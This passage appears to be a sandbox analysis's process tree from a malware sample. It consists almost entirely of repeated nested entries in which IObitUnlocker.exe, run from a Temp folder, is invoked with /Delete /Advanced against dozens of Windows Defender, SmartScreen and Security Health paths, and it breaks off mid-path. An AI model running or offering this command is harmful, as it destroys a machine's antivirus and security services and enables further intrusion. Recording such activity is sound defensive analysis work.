                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 